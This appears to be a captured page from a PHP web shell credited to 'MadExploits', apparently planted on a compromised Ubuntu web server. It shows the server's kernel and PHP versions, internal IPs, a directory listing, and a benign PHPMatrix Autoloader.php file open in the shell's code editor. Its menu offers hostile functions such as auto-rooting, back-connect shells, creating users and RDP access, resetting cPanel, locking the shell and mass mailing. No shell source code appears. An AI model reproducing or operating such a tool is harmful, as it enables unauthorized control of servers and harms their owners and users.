Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
vendor /
markbaker /
matrix /
classes /
[ HOME SHELL ]
Name
Size
Permission
Action
src
[ DIR ]
drwxr-x--x
Autoloader.php
1.48
KB
-rwxr-x--x
Bootstrap.php
964
B
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Autoloader.php
<?php namespace Matrix; /** * * Autoloader for Matrix classes * * @package Matrix * @copyright Copyright (c) 2014 Mark Baker (https://github.com/MarkBaker/PHPMatrix) * @license https://opensource.org/licenses/MIT MIT */ class Autoloader { /** * Register the Autoloader with SPL * */ public static function Register() { if (function_exists('__autoload')) { // Register any existing autoloader function with SPL, so we don't get any clashes spl_autoload_register('__autoload'); } // Register ourselves with SPL return spl_autoload_register(['Matrix\\Autoloader', 'Load']); } /** * Autoload a class identified by name * * @param string $pClassName Name of the object to load */ public static function Load($pClassName) { if ((class_exists($pClassName, false)) || (strpos($pClassName, 'Matrix\\') !== 0)) { // Either already loaded, or not a Matrix class request return false; } $pClassFilePath = __DIR__ . DIRECTORY_SEPARATOR . 'src' . DIRECTORY_SEPARATOR . str_replace(['Matrix\\', '\\'], ['', '/'], $pClassName) . '.php'; if ((file_exists($pClassFilePath) === false) || (is_readable($pClassFilePath) === false)) { // Can't load return false; } require($pClassFilePath); } }
Close